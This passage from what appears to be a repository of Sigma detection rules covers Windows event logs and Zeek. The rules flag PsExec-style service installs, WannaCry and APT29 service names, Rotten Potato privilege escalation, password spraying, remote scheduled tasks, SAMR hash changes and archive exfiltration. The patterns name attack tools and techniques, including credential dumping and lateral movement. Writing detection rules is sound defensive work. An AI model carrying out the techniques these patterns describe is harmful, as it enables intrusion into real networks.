    "content": "title: Malicious Service Installations\nid: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a\ndescription: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.\nauthor: Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)\ndate: 2017/03/27\nmodified: 2022/03/21\nreferences:\n    - https://awakesecurity.com/blog/threat-hunting-for-paexec/\n    - https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html\n    - https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf\ntags:\n    - attack.persistence\n    - attack.privilege_escalation\n    - attack.t1003\n    - attack.t1035          # an old one\n    - attack.t1050          # an old one\n    - car.2013-09-005\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    malsvc_paexec:\n        ImagePath|contains: '\\PAExec'\n    malsvc_wannacry:\n        ServiceName: 'mssecsvc2.0'\n    malsvc_persistence:\n        ImagePath|contains: 'net user'\n    malsvc_apt29:\n        ServiceName: 'Java(TM) Virtual Machine Support Service'\n    condition: selection and 1 of malsvc_*\nfalsepositives:\n    - Unknown\nlevel: critical\nstatus: unsupported"
  },
  {
    "path": "unsupported/windows/win_metasploit_or_impacket_smb_psexec_service_install.yml",
    "content": "title: Metasploit Or Impacket Service Installation Via SMB PsExec\nid: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0\ndescription: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation\nauthor: Bartlomiej Czyz, Relativity\ndate: 2021/01/21\nmodified: 2022/03/21\nreferences:\n    - https://bczyz1.github.io/2021/01/30/psexec.html\ntags:\n    - attack.lateral_movement\n    - attack.t1021.002\n    - attack.t1570\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_1:\n        ImagePath|re: '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$'\n        ServiceName|re: '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)'\n        StartType: '3'  # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697\n        ServiceType: '0x10'\n    filter:\n        ServiceName: 'PSEXESVC'\n    condition: selection and selection_1 and not filter\nfields:\n    - ComputerName\n    - SubjectDomainName\n    - SubjectUserName\n    - ServiceName\n    - ServiceFileName\nfalsepositives:\n    - Possible, different agents with an 8 character binary and a 4, 8 or 16 character service name\nlevel: high\nstatus: unsupported"
  },
  {
    "path": "unsupported/windows/win_possible_privilege_escalation_using_rotten_potato.yml",
    "content": "title: Detection of Possible Rotten Potato\nid: 6c5808ee-85a2-4e56-8137-72e5876a5096\ndescription: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/\ntags:\n    - attack.privilege_escalation\n    - attack.t1134           # an old one\n    - attack.t1134.002\nstatus: unsupported\nauthor: Teymur Kheirkhabarov\ndate: 2019/10/26\nmodified: 2020/09/01\nlogsource:\n    category: process_creation\n    product: windows\n    definition: Works only if Sysmon events are enriched with additional information about the process in ParentUser (see the enrichment section)\ndetection:\n    selection:\n        ParentUser:\n            - 'NT AUTHORITY\\NETWORK SERVICE'\n            - 'NT AUTHORITY\\LOCAL SERVICE'\n        User: 'NT AUTHORITY\\SYSTEM'\n    rundllexception:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains: 'DavSetCookie'\n    condition: selection and not rundllexception\nfalsepositives:\n    - Unknown\nlevel: high\nenrichment:\n    - EN_0001_cache_sysmon_event_id_1_info                # http://bit.ly/314zc6x\n    - EN_0002_enrich_sysmon_event_id_1_with_parent_info   # http://bit.ly/2KmSC0l\n"
  },
  {
    "path": "unsupported/windows/win_remote_schtask.yml",
    "content": "title: Remote Schtasks Creation\nid: cf349c4b-99af-40fa-a051-823aa2307a84\nstatus: unsupported\ndescription: Detects remote execution via scheduled task creation or update on the destination host\nauthor: Jai Minton, oscd.community\ndate: 2020/10/05\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\ntags:\n    - attack.lateral_movement\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: security\n    definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection (not in the baseline recommendations by Microsoft).'\ndetection:\n    selection1:\n        EventID: 4624\n        Logon_Type: 3\n    selection2:\n        EventID:\n            - 4698\n            - 4702\n    filter1:\n        Source_Network_Address:\n            - '::1'\n            - '127.0.0.1'\n    filter2:\n        Source_Network_Address: '-'\n    timeframe: 30d\n    condition: (selection1 and not filter1) or selection2 and not filter2\n    #   where:\n    #       selection1: TargetLogonID = selection2: SubjectLogonID, grouped by host over 30 seconds | eventcount > 1\n    #   Rule should trigger where the SubjectLogonID from event 4698 or 4702 is the same as the TargetLogonID from event 4624 with a Logon_Type of 3, in a 30-second period, provided it's from the same host.\n    #   This logic would be similar to the Splunk 'transaction' command, which groups related events over a timeframe.\n    #       This takes both field values (e.g. Logon_ID) and an expression (e.g. startswith=(EventCode=4624) maxspan=30s), which is applied to the raw event log to find events, at which point a union based on the given criteria merges these events into a single transaction.\n    #   This is similar to stats as an aggregation function, but lets you see the raw text of events rather than calculating stats on them, and it retains the raw event so that an eval expression can be used for grouping. This is beneficial because fields such as LogonIDs are reused over time.\n    #   By having this you can group logon events to their remote schtask creation event (as it is searching for a logon followed by a schtask creation) even when using a search timeframe over a long period, e.g. 30 days, without running the risk of incorrectly grouping a LogonID at one time with a task creation at another.\n    #   Rule logic is currently not supported by SIGMA.\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_remote_service.yml",
    "content": "action: global\ntitle: Remote Service Creation\nid: 4a3a2b96-d7fc-4cb9-80e4-4a545fe95f46\nstatus: unsupported\ndescription: Detects remote execution via service creation on the destination host\nauthor: Jai Minton, oscd.community\ndate: 2020/10/05\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\ntags:\n    - attack.lateral_movement\n    - attack.persistence\n    - attack.execution\n    - attack.t1543.003\ndetection:\n    selection1:\n        EventID: 4624\n        Logon_Type: 3\n    filter1:\n        Source_Network_Address:\n            - '::1'\n            - '127.0.0.1'\n    timeframe: 30s\n    condition: (selection1 and not filter1) or selection2\n    #   where:\n    #       selection1: TargetLogonID = selection2: SubjectLogonID, grouped by host over 30 seconds | eventcount > 1\n    #   Rule should trigger where the SubjectLogonID from event 7045 is the same as the TargetLogonID from event 4624 with a Logon_Type of 3, in a 30-second period, provided it's from the same host.\n    #   This logic would be similar to the Splunk 'transaction' command, which groups related events over a timeframe.\n    #       This takes both field values (e.g. host) and an expression (e.g. startswith=(EventCode=4624) maxspan=30s), which is applied to the raw event log to find events, at which point a union based on the given criteria merges these events into a single transaction.\n    #   This is similar to stats as an aggregation function, but lets you see the raw text of events rather than calculating stats on them, and it retains the raw event so that an eval expression can be used for grouping. This is beneficial because fields such as LogonIDs are reused over time.\n    #   By having this you can group logon events to their remote service creation event (as it is searching for a logon followed by a service creation) even when using a search timeframe over a long period, e.g. 30 days, without running the risk of incorrectly grouping a LogonID at one time with a service creation at another.\n    #   Rule logic is currently not supported by SIGMA.\nfalsepositives:\n    - Unknown\nlevel: medium\n---\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection2:\n        EventID: 4697\n---\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection2:\n        EventID: 7045"
  },
  {
    "path": "unsupported/windows/win_security_global_catalog_enumeration.yml",
    "content": "title: Enumeration via the Global Catalog\nid: 619b020f-0fd7-4f23-87db-3f51ef837a34\nstatus: unsupported\ndescription: Detects enumeration of the global catalog (which can be performed using BloodHound or other AD reconnaissance tools). Adjust the threshold according to domain size.\nreferences:\n    - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156\nauthor: Chakib Gzenayi (@Chak092), Hosni Mribah\ndate: 2020/05/11\nmodified: 2023/02/24\ntags:\n    - attack.discovery\n    - attack.t1087.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Windows Filtering Platform > Filtering Platform Connection\" must be configured for Success'\ndetection:\n    selection:\n        EventID: 5156\n        DestPort:\n            - 3268\n            - 3269\n    timeframe: 1h\n    condition: selection | count() by SourceAddress > 2000\nfalsepositives:\n    - Exclude known DCs.\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_rare_schtasks_creations.yml",
    "content": "title: Rare Schtasks Creations\nid: b0d77106-7bb0-41fe-bd94-d1752164d066\nstatus: unsupported\ndescription: Detects rare scheduled task creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/03/23\nmodified: 2023/02/24\ntags:\n    - attack.execution\n    - attack.privilege_escalation\n    - attack.persistence\n    - car.2013-08-001\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: security\n    definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection (not in the baseline recommendations by Microsoft). We also recommend extracting the Command field from the embedded XML in the event data.'\ndetection:\n    selection:\n        EventID: 4698\n    timeframe: 7d\n    condition: selection | count() by TaskName < 5\nfalsepositives:\n    - Software installation\n    - Software updates\nlevel: low\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_explicit_credentials.yml",
    "content": "title: Password Spraying via Explicit Credentials\nid: 196a29c2-e378-48d8-ba07-8a9e61f7fab9\nstatus: unsupported\ndescription: Detects a single user failing to authenticate to multiple users using explicit credentials.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco, Zach Mathis\ndate: 2021/06/01\nmodified: 2023/02/24\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4648\n    filter:\n        SubjectUserName|endswith: '$' # There will be much noise from computer accounts to UMFD-0, DWM-1, etc...\n    timeframe: 1h\n    condition: selection and not filter | count(TargetUserName) by SubjectUserName > 10\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_process.yml",
    "content": "title: Multiple Users Failing to Authenticate from Single Process\nid: fe563ab6-ded4-4916-b49f-a3a8445fe280\nstatus: unsupported\ndescription: Detects failed logins with multiple accounts from a single process on the system.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\n    - https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing\nauthor: Mauricio Velazco\ndate: 2021/06/01\nmodified: 2023/03/13\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4625\n        LogonType: 2\n    filter:\n        ProcessName: '-'\n    timeframe: 24h\n    condition: selection1 and not filter | count(TargetUserName) by ProcessName > 10\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source.yml",
    "content": "title: Failed Logins with Different Accounts from Single Source System\nid: e98374a6-e2d9-4076-9b5c-11bdb2569995\nstatus: unsupported\ndescription: Detects suspicious failed logins with different user accounts from a single source system\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/01/10\nmodified: 2023/02/24\ntags:\n    - attack.persistence\n    - attack.privilege_escalation\n    - attack.t1078\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID:\n            - 529\n            - 4625\n        TargetUserName: '*'\n        WorkstationName: '*'\n    condition: selection1 | count(TargetUserName) by WorkstationName > 3\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source2.yml",
    "content": "title: Failed NTLM Logins with Different Accounts from Single Source System\nid: 6309ffc4-8fa2-47cf-96b8-a2f72e58e538\nrelated:\n    - id: e98374a6-e2d9-4076-9b5c-11bdb2569995\n      type: derived\nstatus: unsupported\ndescription: Detects suspicious failed logins with different user accounts from a single source system\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/01/10\nmodified: 2023/02/24\ntags:\n    - attack.persistence\n    - attack.privilege_escalation\n    - attack.t1078\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection2:\n        EventID: 4776\n        TargetUserName: '*'\n        Workstation: '*'\n    timeframe: 24h\n    condition: selection2 | count(TargetUserName) by Workstation > 3\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source_kerberos.yml",
    "content": "title: Valid Users Failing to Authenticate From Single Source Using Kerberos\nid: 5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98\nstatus: unsupported\ndescription: Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco, frack113\ndate: 2021/06/01\nmodified: 2023/03/13\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4771\n        Status: '0x18'\n    filter_computer:\n        TargetUserName|endswith: '$'\n    timeframe: 24h\n    condition: selection and not filter_computer | count(TargetUserName) by IpAddress > 10\nfalsepositives:\n    - Vulnerability scanners\n    - Misconfigured systems\n    - Remote administration tools\n    - VPN terminators\n    - Multiuser systems like Citrix server farms\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source_kerberos2.yml",
    "content": "title: Disabled Users Failing To Authenticate From Source Using Kerberos\nid: 4b6fe998-b69c-46d8-901b-13677c9fb663\nstatus: unsupported\ndescription: Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco, frack113\ndate: 2021/06/01\nmodified: 2023/03/13\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4768\n        Status: '0x12'\n    filter_computer:\n        TargetUserName|endswith: '$'\n    timeframe: 24h\n    condition: selection and not filter_computer | count(TargetUserName) by IpAddress > 10\nfalsepositives:\n    - Vulnerability scanners\n    - Misconfigured systems\n    - Remote administration tools\n    - VPN terminators\n    - Multiuser systems like Citrix server farms\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source_kerberos3.yml",
    "content": "title: Invalid Users Failing To Authenticate From Source Using Kerberos\nid: bc93dfe6-8242-411e-a2dd-d16fa0cc8564\nstatus: unsupported\ndescription: Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco, frack113\ndate: 2021/06/01\nmodified: 2023/03/13\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4768\n        Status: '0x6'\n    filter_computer:\n        TargetUserName|endswith: '$'\n    timeframe: 24h\n    condition: selection and not filter_computer | count(TargetUserName) by IpAddress > 10\nfalsepositives:\n    - Vulnerability scanners\n    - Misconfigured systems\n    - Remote administration tools\n    - VPN terminators\n    - Multiuser systems like Citrix server farms\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source_ntlm.yml",
    "content": "title: Valid Users Failing to Authenticate from Single Source Using NTLM\nid: f88bab7f-b1f4-41bb-bdb1-4b8af35b0470\nstatus: unsupported\ndescription: Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco\ndate: 2021/06/01\nmodified: 2023/03/13\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4776\n        Status: '*0xC000006A' #Account logon with misspelled or bad password.\n    filter:\n        TargetUserName: '*$'\n    timeframe: 24h\n    condition: selection1 and not filter | count(TargetUserName) by Workstation > 10\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source_ntlm2.yml",
    "content": "title: Invalid Users Failing To Authenticate From Single Source Using NTLM\nid: 56d62ef8-3462-4890-9859-7b41e541f8d5\nstatus: unsupported\ndescription: Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco\ndate: 2021/06/01\nmodified: 2023/03/13\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4776\n        Status: '*0xC0000064' # The username you typed does not exist. Bad username.\n    filter:\n        TargetUserName: '*$'\n    timeframe: 24h\n    condition: selection1 and not filter | count(TargetUserName) by Workstation > 10\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_remote_logons_single_source.yml",
    "content": "title: Multiple Users Remotely Failing To Authenticate From Single Source\nid: add2ef8d-dc91-4002-9e7e-f2702369f53a\nstatus: unsupported\ndescription: Detects a source system failing to authenticate against a remote host with multiple users.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco\ndate: 2021/06/01\nmodified: 2023/02/24\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4625\n        LogonType: 3\n    filter:\n        IpAddress: '-'\n    timeframe: 24h\n    condition: selection1 and not filter | count(TargetUserName) by IpAddress > 10\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_multiple_files_renamed_or_deleted.yml",
    "content": "title: Suspicious Multiple File Rename Or Delete Occurred\nid: 97919310-06a7-482c-9639-92b67ed63cf8\nstatus: unsupported\ndescription: Detects multiple file rename or delete events occurring within a specified period of time by the same user (these events may signal ransomware activity).\nreferences:\n    - https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html\nauthor: Vasiliy Burov, oscd.community\ndate: 2020/10/16\nmodified: 2023/02/24\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Policies/Windows Settings/Security Settings/Local Policies/Audit Policy/Audit object access, Policies/Windows Settings/Security Settings/Advanced Audit Policy Configuration/Object Access'\ndetection:\n    selection:\n        EventID: 4663\n        ObjectType: 'File'\n        AccessList: '%%1537'\n        Keywords: '0x8020000000000000'\n    timeframe: 30s\n    condition: selection | count() by SubjectLogonId > 10\nfalsepositives:\n    - Software uninstallation\n    - Files restore activities\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_samr_pwset.yml",
    "content": "title: Possible Remote Password Change Through SAMR\nid: 7818b381-5eb1-4641-bea5-ef9e4cfb5951\nstatus: unsupported\ndescription: |\n  Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().\n  \"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see these events.\nauthor: Dimitrios Slamaris\ndate: 2017/06/09\nmodified: 2023/02/24\ntags:\n    - attack.credential_access\n    - attack.t1212\nlogsource:\n    product: windows\n    service: security\ndetection:\n    samrpipe:\n        EventID: 5145\n        RelativeTargetName: samr\n    passwordchanged:\n        EventID: 4738\n    passwordchanged_filter:\n        PasswordLastSet:\n    timeframe: 15s\n    condition: ( passwordchanged and not passwordchanged_filter ) | near samrpipe\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_susp_failed_hidden_share_mount.yml",
    "content": "title: Failed Mounting of Hidden Share\nid: 1c3be8c5-6171-41d3-b792-cab6f717fcdb\nstatus: unsupported\ndescription: Detects repeated failed (outgoing) attempts to mount a hidden share\nreferences:\n    - https://twitter.com/moti_b/status/1032645458634653697\n    - https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5\nauthor: Fabian Franz\ndate: 2022/08/30\nmodified: 2023/02/24\ntags:\n    - attack.t1021.002\n    - attack.lateral_movement\nlogsource:\n    product: windows\n    service: smbclient-security\ndetection:\n    selection:\n        EventID: 31010\n        ShareName|endswith: '$'\n    timeframe: 1m\n    condition: selection | count() > 10\nfields:\n    - ShareName\nfalsepositives:\n    - Legitimate administrative activity\n    - Faulty scripts\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_suspicious_werfault_connection_outbound.yml",
    "content": "title: Suspicious Werfault.exe Network Connection Outbound\nid: e12c75f2-d09e-43f6-90e4-6a23842907af\nstatus: experimental\ndescription: Adversaries can migrate cobalt strike/metasploit/C2 beacons on compromised systems to legitimate werfault.exe process to avoid detection.\nreferences:\n    - https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/\nauthor: Sreeman\ndate: 2021/03/09\nmodified: 2021/06/11\ntags:\n    - attack.command_and_control\n    - attack.t1571\nlogsource:\n  product: windows\n  category: network_connection\ndetection:\n  selection:\n    Image: 'werfault.exe'\n  filter1:\n    ParentImage: 'svchost.exe'\n  filter2:\n    DestinationIp:\n        - '104.42.151.234'\n        - '104.43.193.48'\n        - '52.255.188.83'\n        - '13.64.90.137'\n        - '168.61.161.212'\n        - '13.88.21.125'\n        - '40.88.32.150'\n        - '52.147.198.201'\n        - '52.239.207.100'\n        - '52.176.224.96'\n        - '2607:7700:0:24:0:1:287e:1894'\n        - '10.*'\n        - '192.168.*'\n        - '127.*'\n  filter3:\n    DestinationHostname|contains:\n        - '*.windowsupdate.com'\n        - '*.microsoft.com'\n  condition: selection and not ( filter1 and filter2 and filter3 )\nfalsepositives:\n    - Communication to other corporate systems that use IP addresses from public address spaces and Microsoft IP spaces\nlevel: medium"
  },
  {
    "path": "unsupported/windows/win_system_rare_service_installs.yml",
    "content": "title: Rare Service Installations\nid: 66bfef30-22a5-4fcd-ad44-8d81e60922ae\nstatus: unsupported\ndescription: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/03/08\nmodified: 2023/02/24\ntags:\n    - attack.persistence\n    - attack.privilege_escalation\n    - car.2013-09-005\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    timeframe: 7d\n    condition: selection | count() by ServiceName < 5\nfalsepositives:\n    - Software installation\n    - Software updates\nlevel: low\n"
  },
  {
    "path": "unsupported/windows/win_taskscheduler_rare_schtask_creation.yml",
    "content": "title: Rare Scheduled Task Creations\nid: b20f6158-9438-41be-83da-a5a16ac90c2b\nstatus: unsupported\ndescription: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/03/17\nmodified: 2023/02/24\ntags:\n    - attack.persistence\n    - attack.s0111\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: taskscheduler\n    definition: the \"Microsoft-Windows-TaskScheduler/Operational\" is disabled by default and should be enabled in order for this detection to work\ndetection:\n    selection:\n        EventID: 106\n    filter1:\n        TaskName: \\Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\n    timeframe: 7d\n    condition: selection and not 1 of filter* | count() by TaskName < 5\nfalsepositives:\n    - Software installation\nlevel: low\n"
  },
  {
    "path": "unsupported/zeek/zeek_dce_rpc_domain_user_enumeration.yml",
    "content": "title: Domain User Enumeration Network Recon 01\nid: 66a0bdc6-ee04-441a-9125-99d2eb547942\nstatus: unsupported\ndescription: |\n    Domain user and group enumeration via network reconnaissance.\n    Seen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.\n    The rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/37\nauthor: 'Nate Guagenti (@neu5ron), Open Threat Research (OTR)'\ndate: 2020/05/03\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1087.002\n    - attack.t1082\nlogsource:\n    product: zeek\n    service: dce_rpc\ndetection:\n    selection:\n        operation:\n            #- LsarEnumerateTrustedDomains #potentially too many FPs, removing. caused by netlogon\n            #- SamrEnumerateDomainsInSamServer #potentially too many FPs, removing. #method obtains a listing of all domains hosted by the server side of this protocol. This value is a cookie that the server can use to continue an enumeration on a subsequent call\n            - LsarLookupNames3 #method translates a batch of security principal names to their SID form\n            - LsarLookupSids3 #translates a batch of security principal SIDs to their name forms\n            - SamrGetGroupsForUser #obtains a listing of groups that a user is a member of\n            - SamrLookupIdsInDomain #method translates a set of RIDs into account names\n            - SamrLookupNamesInDomain #method translates a set of account names into a set of RIDs\n            - SamrQuerySecurityObject #method queries the access control on a server, domain, user, group, or alias object\n            - SamrQueryInformationGroup #obtains attributes from a group object\n    timeframe: 30s\n    condition: selection | count(operation) by src_ip > 4\nfalsepositives:\n    - Devices that may do authentication like a VPN or a firewall that looks up IPs to usernames\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "unsupported/zeek/zeek_http_exfiltration_compressed_files.yml",
    "content": "title: Potential Exfiltration of Compressed Files\nid: 0d47e3f6-357f-4534-928c-202631d065fa\nstatus: unsupported\ndescription: |\n    This rule detects potential exfiltration by looking for a few compression extensions in the uri and signs of compression in the mime type, file type, and http body\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/17\nauthor: Greg Howell, OTR (Open Threat Research)\ndate: 2020/04/05\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1560.001\n    - attack.t1005\nlogsource:\n    product: zeek\n    service: http\ndetection:\n    selection1:\n        uri|endswith:\n         - '.7z'\n         - '.zip'\n         - '.rar'\n        mime_types|endswith: 'compressed'\n    selection3:\n        filetype|endswith: 'compressed'\n    selection4:\n        http.bodyMagic|endswith: 'compressed'\n        http.method: PUT\n    condition: selection1 or selection3 or selection4\nfalsepositives:\n    - Legitimate upload/download of archives\nlevel: medium\n"
  }
]